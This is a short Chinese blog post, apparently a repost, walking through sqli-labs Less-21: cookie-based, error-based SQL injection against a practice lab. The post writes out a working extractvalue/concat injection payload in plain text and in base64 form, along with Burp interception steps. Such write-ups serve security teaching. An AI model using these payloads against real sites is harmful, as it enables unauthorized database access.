首页 > 数据库技术 > 详细

SQLI DUMB SERIES-21

时间:2019-04-14 18:51:13      阅读:180      评论:0      收藏:0      [点我收藏+]

Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)

(1)登录成功后有以下页面:

技术分享图片

其中红圈内的字符为admin的BASED64编码后的字符。

(2)用burp抓包,再刷新浏览器。

寻找闭合方式:明文:admin‘ --+ based64编码:YWRtaW4nICAtLSs=

技术分享图片

闭合方式为‘ )

(3)开始报错注入,需要将payload用based63编码输入。例如:爆表名

admin‘) and extractvalue(1,concat(0x7e,(select database())))and (‘

 编码:

YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSkpYW5kICgn

 技术分享图片

技术分享图片

SQLI DUMB SERIES-21

原文:https://www.cnblogs.com/momoli/p/10706303.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!